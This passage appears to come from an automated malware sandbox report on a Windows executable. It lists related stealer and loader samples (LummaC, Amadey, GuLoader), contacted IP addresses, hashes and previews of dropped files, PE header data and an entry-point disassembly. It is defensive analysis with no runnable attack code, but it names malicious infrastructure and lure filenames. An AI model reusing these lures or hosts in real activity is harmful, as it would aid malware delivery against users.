                                                                                                                                                                                                                                  • 104.131.68.180
                                                                                                                                                                                                                                  • 104.121.10.34
                                                                                                                                                                                                                                  • 45.77.249.79
                                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                                                                                                                                  • 104.131.68.180
                                                                                                                                                                                                                                  • 104.121.10.34
                                                                                                                                                                                                                                  • 45.77.249.79
                                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                                                  • 104.131.68.180
                                                                                                                                                                                                                                  • 104.121.10.34
                                                                                                                                                                                                                                  • 45.77.249.79
                                                                                                                                                                                                                                  37f463bf4616ecd445d4a1937da06e19he55PbvM2G.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 104.21.56.70
                                                                                                                                                                                                                                  fsg5PWtTm2.lnkGet hashmaliciousRedLine, SectopRATBrowse
                                                                                                                                                                                                                                  • 104.21.56.70
                                                                                                                                                                                                                                  1iC0WTxgUf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  • 104.21.56.70
                                                                                                                                                                                                                                  Instruction_695-18112-002_Rev.PDF.lnk.d.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  • 104.21.56.70
                                                                                                                                                                                                                                  PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                                                                                  • 104.21.56.70
                                                                                                                                                                                                                                  file.exeGet hashmaliciousScreenConnect Tool, Amadey, RHADAMANTHYS, XWorm, XmrigBrowse
                                                                                                                                                                                                                                  • 104.21.56.70
                                                                                                                                                                                                                                  Justificante pago-09453256434687.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                  • 104.21.56.70
                                                                                                                                                                                                                                  ME-SPC-94.03.60.175.07.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                                                                  • 104.21.56.70
                                                                                                                                                                                                                                  09-FD-94.03.60.175.07.xlsx.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                                                                  • 104.21.56.70
                                                                                                                                                                                                                                  TEC-SPC-94.03.60.175.07.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                                                                  • 104.21.56.70
                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\8BB0.tmp.exehe55PbvM2G.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ScreenUpdateSync[1].exehe55PbvM2G.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                                                                                      Entropy (8bit):0.9579107995262098
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:96:WC1An1esSh4Bo74sfNUQXIDcQDc6/cEOcw30+HbHg/8BRTf3Oy1E45WAU6NCUtW9:6n1eAdWb0N7UBju3RzuiFuZ24IO85
                                                                                                                                                                                                                                      MD5:4FA365A52D4AEFE016091E15512651EC
                                                                                                                                                                                                                                      SHA1:E013D5192C5CE61D435B99CE2001A7FF2CB251C3
                                                                                                                                                                                                                                      SHA-256:C91F06008A12A46934CBA545D5AD289C6DE7578700C217E294560F91CD83A3AA
                                                                                                                                                                                                                                      SHA-512:7197BC983133909C63F68E3BBE32955209CAC39FAB2857EF2DB4F5D69CAA43D5A88A8EDCA95177D223A6FE261F164B1B973B674684A29898E1DE14A7B8D11F14
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.8.9.3.5.3.6.4.2.2.4.9.7.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.8.9.3.5.3.6.8.5.9.9.9.8.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.6.6.3.0.b.9.4.-.f.b.2.8.-.4.0.b.1.-.8.6.9.2.-.d.2.e.1.7.a.b.5.d.2.0.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.5.3.4.d.3.4.a.-.d.f.9.5.-.4.4.3.c.-.b.8.6.4.-.7.a.4.c.b.5.d.5.b.5.1.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.8.B.B.0...t.m.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.3.c.8.-.0.0.0.1.-.0.0.1.4.-.6.c.2.b.-.e.7.e.7.5.3.5.0.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.3.b.b.5.d.9.2.d.9.8.0.a.b.9.7.a.4.d.2.4.0.b.0.1.3.8.1.e.f.5.2.8.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.a.8.a.d.3.d.9.2.a.5.a.5.7.f.0.7.5.d.e.4.0.c.c.3.a.6.3.9.1.d.b.a.2.7.9.e.c.1.!.8.B.B.0...t.m.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.
                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      File Type:Mini DuMP crash report, 15 streams, Tue Dec 17 07:18:56 2024, 0x1205a4 type
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):45886
                                                                                                                                                                                                                                      Entropy (8bit):2.5564247196369805
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:w9wfbXECOKV4mVOx1BiNOiAeb43Rzx13LhpcUaJ0lrcqdsRuakDkWdSq:H6KVR4TBLiAebquP0ljCjkvR
                                                                                                                                                                                                                                      MD5:E22CDB02A481225D4338BB304BAB5264
                                                                                                                                                                                                                                      SHA1:28145657FCADFF400DFE58984B6DA3762701CC61
                                                                                                                                                                                                                                      SHA-256:5D27D3D8F8EDEB1613DA4B33D8D0F7A62A1F0460E1B20B210A3863E12CD36200
                                                                                                                                                                                                                                      SHA-512:EC725F48C15EC6900AD77B1980A56182C78BED85087082A2D37968779E8BBA6BC1BD47E7FCED874C495DD9BCCAA21C960BDCF0BE2000706E690AB8DB0828FFF7
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Preview:MDMP..a..... ........%ag............4...............H...........<.......t...|-..........`.......8...........T............@...r......................................................................................................eJ......t ......GenuineIntel............T............%ag.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):8288
                                                                                                                                                                                                                                      Entropy (8bit):3.699093105152641
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:R6l7wVeJp36iB6YXd6Ikgmfw1UjppDO89bmSsf0oKACm:R6lXJ56E6Yt67gmfVLmRfj7
                                                                                                                                                                                                                                      MD5:D7160B04933C28F3170EA97257514909
                                                                                                                                                                                                                                      SHA1:ED74DFD1FFE427D4A82DCC9679E8B2231B6D16E4
                                                                                                                                                                                                                                      SHA-256:E538EC46C6BF103D9B187D060FF085B2C13B7C750B320718990F8DFA97E2DE2E
                                                                                                                                                                                                                                      SHA-512:B03A4798E33879F706AC45C129AFB0E4C3667A69484372F9105AD5AC85F410E6A298261BC29A85311677602980B8F9B590A342C42277588D283F7205A80186F3
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.0.6.4.<./.P.i.
                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):4565
                                                                                                                                                                                                                                      Entropy (8bit):4.446038168558606
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:cvIwWl8zsBJg77aI9MayWpW8VYe0Ym8M4Jj9bcFjI+q8rxCRGzU3d:uIjfTI76W7VZJuInGzU3d
                                                                                                                                                                                                                                      MD5:7118F1757A6CDF5272EF0265BD91CDF8
                                                                                                                                                                                                                                      SHA1:E3F480AEDB8C8D0E6F5D0B0642933B3C41F2462D
                                                                                                                                                                                                                                      SHA-256:7D988311CAB1F7E221ED1EB68B2B7883DCDC3996443B8EF927C79091D572706B
                                                                                                                                                                                                                                      SHA-512:97317B30EF5BF60059823DB57241372B87D57ADDEC9B8F66F95838E6647E604A49C7540B458BC478929DFF3D29B2F9B693B72C6D0F02FD2F5CB6945C3E5324F1
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="634941" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\DG55Gu1yGM.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):368640
                                                                                                                                                                                                                                      Entropy (8bit):6.6886130130371235
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:6144:Qh4EPRjisApQk6co65oisFCB6EGSToOC03y6o+nLxQTwdbG:Qh4agH6c55AF6lGStCIy6DLx4wBG
                                                                                                                                                                                                                                      MD5:2C0A5976C7D6D86506EB825C8D67A8B8
                                                                                                                                                                                                                                      SHA1:55A8AD3D92A5A57F075DE40CC3A6391DBA279EC1
                                                                                                                                                                                                                                      SHA-256:580B4B31B7215EB5FFF2396E350607376DE72AFEF4B3A7E3D841E14081F5E9CB
                                                                                                                                                                                                                                      SHA-512:0B6EFBDD6DCA47D84D168A15C71014A4926D3215C3746E05008300680B2D784E7664C341E348061339469E32AD4036221C74EAD6ABE28C38616D4BF64364D113
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                                                                                                      • Filename: he55PbvM2G.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O.)..rGA.rGA.rGA.=.A.rGA. .A.rGA. .A.rGA. .AerGA,.<A.rGA.rFA}rGA. .A.rGA. .A.rGA. .A.rGARich.rGA........................PE..L...g.$f.....................&?.....w.............@.......................... C..............................................)..<.....B..............................................................................................................text............................... ..`.rdata...#.......$..................@..@.data.....=..@...p..."..............@....rsrc.........B.....................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\DG55Gu1yGM.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):368640
                                                                                                                                                                                                                                      Entropy (8bit):6.6886130130371235
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:6144:Qh4EPRjisApQk6co65oisFCB6EGSToOC03y6o+nLxQTwdbG:Qh4agH6c55AF6lGStCIy6DLx4wBG
                                                                                                                                                                                                                                      MD5:2C0A5976C7D6D86506EB825C8D67A8B8
                                                                                                                                                                                                                                      SHA1:55A8AD3D92A5A57F075DE40CC3A6391DBA279EC1
                                                                                                                                                                                                                                      SHA-256:580B4B31B7215EB5FFF2396E350607376DE72AFEF4B3A7E3D841E14081F5E9CB
                                                                                                                                                                                                                                      SHA-512:0B6EFBDD6DCA47D84D168A15C71014A4926D3215C3746E05008300680B2D784E7664C341E348061339469E32AD4036221C74EAD6ABE28C38616D4BF64364D113
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                                                                                                      • Filename: he55PbvM2G.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O.)..rGA.rGA.rGA.=.A.rGA. .A.rGA. .A.rGA. .AerGA,.<A.rGA.rFA}rGA. .A.rGA. .A.rGA. .A.rGARich.rGA........................PE..L...g.$f.....................&?.....w.............@.......................... C..............................................)..<.....B..............................................................................................................text............................... ..`.rdata...#.......$..................@..@.data.....=..@...p..."..............@....rsrc.........B.....................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1835008
                                                                                                                                                                                                                                      Entropy (8bit):4.42149183688115
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:6144:6Svfpi6ceLP/9skLmb0OT6WSPHaJG8nAgeMZMMhA2fX4WABlEnNp0uhiTw:pvloT6W+EZMM6DFyD03w
                                                                                                                                                                                                                                      MD5:F2929EC7EA1D89E17391969CBE10536E
                                                                                                                                                                                                                                      SHA1:E8BDD4665EFF1FABB841B883AF5471A8619AD953
                                                                                                                                                                                                                                      SHA-256:5D17EA6B0EFA583CF94535B703B53B7C360566BF8C411A64A7BB22EF3533A882
                                                                                                                                                                                                                                      SHA-512:011F1849838EFA50ABC054BD1A07919AFEFDEAA7F27789D05D18B5B017A430C4F4FA571BBAD2F371E5487504AA2FC474482B2152F2FC183F795226DD06CC603E
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..5.SP..............................................................................................................................................................................................................................................................................................................................................c~".........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Entropy (8bit):6.477182771447748
                                                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                      File name:DG55Gu1yGM.exe
                                                                                                                                                                                                                                      File size:499'712 bytes
                                                                                                                                                                                                                                      MD5:f5f01c71d9ad196656cdceef7c1f12e6
                                                                                                                                                                                                                                      SHA1:962510bfb783205e77952ba732d64ef893270c54
                                                                                                                                                                                                                                      SHA256:2dda3c98fdc0a1a6cfeb495975c4ef006342388e1e9bcbbd2f11d323ac443090
                                                                                                                                                                                                                                      SHA512:499088adae2e389b38351163d17d4da1badd2f5cfb2e957ce5ce207948d241c911c78a6684b7a330ac3c3a8eecd4e418a23b65671fe50b01ba75e794a0af1695
                                                                                                                                                                                                                                      SSDEEP:6144:L+DODBpALP7DgUx8TCYtcYVyUEe89DQhtVaCa9Y/t4pb+8hUB9Wj/Akiy:KDkBpAz7D78jyU4svFb/ipq8JB
                                                                                                                                                                                                                                      TLSH:09B401123591C173D97556324465CA328E7BB8750BA949CB3FD8227C6F227E39F3234A
                                                                                                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........nKK..%...%...%..]....%..]....%..]..1.%...^...%...$.0.%..]....%..]....%..]....%.Rich..%.................PE..L...?W.e...........
                                                                                                                                                                                                                                      Icon Hash:86c7c30b0f4e0d99
                                                                                                                                                                                                                                      Entrypoint:0x40872b
                                                                                                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                                                                                                      Digitally signed:false
                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                      DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                      Time Stamp:0x65AD573F [Sun Jan 21 17:41:19 2024 UTC]
                                                                                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                                                                                      OS Version Major:5
                                                                                                                                                                                                                                      OS Version Minor:0
                                                                                                                                                                                                                                      File Version Major:5
                                                                                                                                                                                                                                      File Version Minor:0
                                                                                                                                                                                                                                      Subsystem Version Major:5
                                                                                                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                                                                                                      Import Hash:c00735f05d13fd7a2bf1a7281832b72f
                                                                                                                                                                                                                                      Instruction
                                                                                                                                                                                                                                      call 00007FD13D5208D7h
                                                                                                                                                                                                                                      jmp 00007FD13D518AEEh
                                                                                                                                                                                                                                      mov edi, edi
                                                                                                                                                                                                                                      push ebp
                                                                                                                                                                                                                                      mov ebp, esp
                                                                                                                                                                                                                                      sub esp, 00000328h
                                                                                                                                                                                                                                      mov eax, dword ptr [00471468h]
                                                                                                                                                                                                                                      xor eax, ebp
                                                                                                                                                                                                                                      mov dword ptr [ebp-04h], eax
                                                                                                                                                                                                                                      test byte ptr [00471144h], 00000001h
                                                                                                                                                                                                                                      push esi
                                                                                                                                                                                                                                      je 00007FD13D518C7Ah
                                                                                                                                                                                                                                      push 0000000Ah
                                                                                                                                                                                                                                      call 00007FD13D52019Bh
                                                                                                                                                                                                                                      pop ecx
                                                                                                                                                                                                                                      call 00007FD13D520991h
                                                                                                                                                                                                                                      test eax, eax
                                                                                                                                                                                                                                      je 00007FD13D518C7Ah
                                                                                                                                                                                                                                      push 00000016h
                                                                                                                                                                                                                                      call 00007FD13D520993h
                                                                                                                                                                                                                                      pop ecx
                                                                                                                                                                                                                                      test byte ptr [00471144h], 00000002h
                                                                                                                                                                                                                                      je 00007FD13D518D40h
                                                                                                                                                                                                                                      mov dword ptr [ebp-00000220h], eax
                                                                                                                                                                                                                                      mov dword ptr [ebp-00000224h], ecx
                                                                                                                                                                                                                                      mov dword ptr [ebp-00000228h], edx
                                                                                                                                                                                                                                      mov dword ptr [ebp-0000022Ch], ebx
                                                                                                                                                                                                                                      mov dword ptr [ebp-00000230h], esi
                                                                                                                                                                                                                                      mov dword ptr [ebp-00000234h], edi
                                                                                                                                                                                                                                      mov word ptr [ebp-00000208h], ss
                                                                                                                                                                                                                                      mov word ptr [ebp-00000214h], cs
                                                                                                                                                                                                                                      mov word ptr [ebp-00000238h], ds
                                                                                                                                                                                                                                      mov word ptr [ebp-0000023Ch], es
                                                                                                                                                                                                                                      mov word ptr [ebp-00000240h], fs
                                                                                                                                                                                                                                      mov word ptr [ebp-00000244h], gs
                                                                                                                                                                                                                                      pushfd
                                                                                                                                                                                                                                      pop dword ptr [ebp-00000210h]
                                                                                                                                                                                                                                      mov esi, dword ptr [ebp+04h]
                                                                                                                                                                                                                                      lea eax, dword ptr [ebp+04h]
                                                                                                                                                                                                                                      mov dword ptr [ebp-0000020Ch], eax
                                                                                                                                                                                                                                      mov dword ptr [ebp-000002D0h], 00010001h
                                                                                                                                                                                                                                      mov dword ptr [ebp-00000218h], esi
                                                                                                                                                                                                                                      mov eax, dword ptr [eax-04h]
                                                                                                                                                                                                                                      push 00000050h
                                                                                                                                                                                                                                      mov dword ptr [ebp+000000E4h], eax
                                                                                                                                                                                                                                      Programming Language:
                                                                                                                                                                                                                                      • [ASM] VS2008 build 21022
                                                                                                                                                                                                                                      • [C++] VS2008 build 21022
                                                                                                                                                                                                                                      • [ C ] VS2008 build 21022
                                                                                                                                                                                                                                      • [IMP] VS2005 build 50727
                                                                                                                                                                                                                                      • [RES] VS2008 build 21022
                                                                                                                                                                                                                                      • [LNK] VS2008 build 21022
                                                                                                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x702700x28.text
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x7d0000x39d8.rsrc
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x38000x40.text
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x10000x1b8.text
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                      .text0x10000x6fc7c0x6fe001fbc71c570addf499060e8dc4d91979eFalse0.6716284043296089data6.687304967964323IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                      .data0x710000xb1c80x640000919758a13f25cdfd697ebc308bf369False0.0913671875data1.2438718393385466IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                      .rsrc0x7d0000x39d80x3a00c19ee46954fdd092ac557da14145e07bFalse0.7629983836206896data6.461731778821008IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                      RT_ICON0x7d1e00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilIndia0.8076036866359447
                                                                                                                                                                                                                                      RT_ICON0x7d1e00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilSri Lanka0.8076036866359447
                                                                                                                                                                                                                                      RT_ICON0x7d8a80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TamilIndia0.8048755186721992
                                                                                                                                                                                                                                      RT_ICON0x7d8a80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TamilSri Lanka0.8048755186721992
                                                                                                                                                                                                                                      RT_ICON0x7fe500x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TamilIndia0.8625886524822695
                                                                                                                                                                                                                                      RT_ICON0x7fe500x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TamilSri Lanka0.8625886524822695
                                                                                                                                                                                                                                      RT_STRING0x805400x496dataTamilIndia0.4454855195911414
                                                                                                                                                                                                                                      RT_STRING0x805400x496dataTamilSri Lanka0.4454855195911414
                                                                                                                                                                                                                                      RT_ACCELERATOR0x802e80x50dataTamilIndia0.825
                                                                                                                                                                                                                                      RT_ACCELERATOR0x802e80x50dataTamilSri Lanka0.825
                                                                                                                                                                                                                                      RT_GROUP_ICON0x802b80x30dataTamilIndia0.9375
                                                                                                                                                                                                                                      RT_GROUP_ICON0x802b80x30dataTamilSri Lanka0.9375
                                                                                                                                                                                                                                      RT_VERSION0x803380x208data0.5384615384615384
                                                                                                                                                                                                                                      DLLImport
